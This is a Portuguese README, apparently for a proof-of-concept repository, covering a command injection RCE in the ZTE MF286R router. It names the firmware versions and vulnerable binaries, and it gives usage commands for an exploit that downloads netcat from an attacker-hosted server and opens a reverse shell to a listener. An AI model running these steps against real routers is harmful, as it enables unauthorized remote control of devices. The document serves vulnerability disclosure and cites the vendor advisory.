
Prova de conceito da vulnerabilidade de injeção de comandos que afeta o roteador ZTE MF286R, incluindo um exploit de RCE.
Detalhes do firmware:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)A vulnerabilidade é uma injeção de comando compartilhada entre o binário zte_net_link_detect e o manipulador WATCH_DOG_SWITCH no servidor web binário goahead.
Observe que a vulnerabilidade só pode ser explorada quando o roteador está conectado à WAN ou à Internet via um cartão SIM. (O valor da chave "ppp_status" deve ser "ppp_connected" ou "ipv4_ipv6_connected" ou "ipv6_connected").
A ideia do exploit é baixar o binário estático do netcat de um servidor http e então abrir um shell reverso com ele. P.S.: O netcat incluído nesta pasta é big endian.
python3 -m http.server 80809999 com nc -lvp 9999python3 exploit.py http://<router> <admin_password> <attacker_ip, ex: 192.168.1.101>Esta vulnerabilidade foi reportada por Andrea Maugeri em setembro de 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664